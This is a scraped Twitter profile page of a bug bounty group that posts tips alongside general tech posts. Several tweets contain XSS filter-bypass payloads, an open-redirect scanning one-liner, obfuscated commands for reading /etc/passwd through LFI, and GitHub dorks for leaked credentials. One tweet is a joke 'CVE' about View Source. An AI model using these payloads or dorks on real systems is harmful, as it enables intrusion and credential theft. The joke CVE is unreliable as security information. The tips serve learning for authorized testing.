@shell_crew profile picture
Shell_Crew @shell_crew

Shell_Crew is a Marketplace and General forum. It is maintained by Team Shell_Crew and our only purpose is to help you out getting more in cyber security & Tech

Joined September 2021
  • Tweets 44
  • Following 20
  • Followers 68
13 Photos and videos
Shell_Crew@shell_crew
20 Nov 2021
Always try the simplest approach first, so you have a reference point to justify any increase in complexity. In ML, this typically means using a non-ML baseline as your first model.
1
BUG BOUNTY TOOLS: -Seltzer -Meg -LazyS3 -AssetFinder -HTTProbe -HostileSub Bruteforcer -JS-Scan -JSParser -Crtndstry -EnumX. sh -Lazyrecon -OneForAll -ReconPi -ffuf -dirsearch
2
Github Recon Dorks for beginners -> filename : s3cfg -> filename : git-credentials -> extension : json api.forecast.io -> jsforce extension : js conn.login -> SF_USERNAME salesforce -> HEROKU_API_KEY language : shell #bugbountytips #bugbounty #bugcrowd #github
2
7
Extract sensitive end-point in JS: cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u #######oneline####### #bugbounty #bugbountytips
1
7
Shell_Crew@shell_crew
27 Oct 2021
Open Redirect: export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' #bugbounty #bugbountytips #bugbountytip
2
2
Shell_Crew@shell_crew
24 Oct 2021
#XSS Bypass Filter! "/><svg svg svg\/\/On OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs
4
8
Shell_Crew@shell_crew
23 Oct 2021
XSS payload for an image: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png #bugbounty #bugbountytips #hacker #BugBounty #HackTheBox
2
5
Shell_Crew@shell_crew
21 Oct 2021
LFI Bypass: 1) /usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd 2) /*/?at$IFS/???/???swd 3)/****/?at$IFS/???/*swd 4)/****/?at$IFS/???/*******swd (IFS is Internal Field Separator = [space], [tab] or a [newline]) #cybersecurity #bugbountytips #Hacking #bugbounty
2
4
Shell_Crew@shell_crew
19 Oct 2021
#DataScience Tools #MachineLearning #programming #DataScientists #Analytics #BigData #AI #Python #ML #NLP #javascript #TensorFlow #Coding #Great #Serverless #100DaysOfCode #Dataviz #DEVCommunity #Devops #SQL #RStats #CodeNewbie #Linux #Python
8
8
Shell_Crew retweeted
The XSS Rat - Proud XSS N00b :-)
@theXSSrat
19 Oct 2021
Wow, i love what @shell_crew have built!! Free labs? Yes please!! shellcrew.org/

3
11
39
Shell_Crew@shell_crew
17 Oct 2021
Origin - Don't Remember Properly #bugbounty #bugbountytip #bugcrowd #cybersecuritytips #privilegesescalation
2
6
Shell_Crew@shell_crew
17 Oct 2021
An #infographic about the companies that know most about you 🕵️‍♂️🔎 They know your privacy better than you do 🔓 #cybersecurity #dataprivacy #infosec
11
16
Shell_Crew@shell_crew
17 Oct 2021
An original Infographic on #MachineLearning with theory and practice concepts #DigitalTransformation #BigData #ArtificialIntelligence #cybersecurity #Blockchain #DX #Analytics #Industry40 #AI #IIoT #DataScience #IoT
4
6
Shell_Crew@shell_crew
17 Oct 2021
CVE-2022-1337: “View Source” affects all known web browsers. —Description— When the F12 key is pressed, the browser outputs source code of target website; no patch available, CVSS: 10. #infosec #cybersecurity #hackers #hacking #hacked #cybercrime #tech
3
5
Shell_Crew@shell_crew
17 Oct 2021
New Write-up on InfoSec Write-ups publication : "CSRF for Begginers" #bugbounty #bugbountywriteup #bugbountytips ift.tt/3j8E0Tc

CSRF for Begginers

CSRF(Cross-site request forgery) is a web application technique where an attacker induces the user to click on a malicious link that…

infosecwriteups.com
4
Shell_Crew@shell_crew
13 Oct 2021
Bug Bounty Info Collection of Bug Bounty Writeups 🔹XSS 🔹CSRF 🔹LFI 🔹Auth Bypass 🔹SQL Injections 🔹IDOR 🔹... #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone github.com/devanshbatham/Awe…
6
Don't call yourself a frontend developer unless you know to make a responsive website 🥴 #Website #webdeveloper #DevOps #DEVCommunity #webdesign #uidesign #uxdesign #uiux #FrontEndDeveloper #Frontend
5
⚡️Invest in the future: • Robotics • Blockchain • Clean Energy • Electric Vehicle • Meat Alternative • Cancer Research • Machine Learning • Space Exploration • Artificial Intelligence • Internet of Things (IoT) What else would you add? #internet #IoT #tech #AI
1
3
9
Welcome to October of 2021 #Cybersecurity So far: -Epik dumps -Facebook whistle blowing/leaks -Facebook outage -Syniverse pwned for last five years -Nieman Marcus userdata breach -Coinbase 2FA notification -Twitch source code and files dumped -The Telegraph userdata exposed
1
5
CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited tenable.com/blog/cve-2021-41… #cybersecurity #CyberAttack #bugbounty #bugbountytips

CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited

The Apache HTTP Server Project patched a path traversal vulnerability introduced less than a month ago that has been exploited in the wild.Update October 7: The Solution section has been updated to...

tenable.com
4
Load more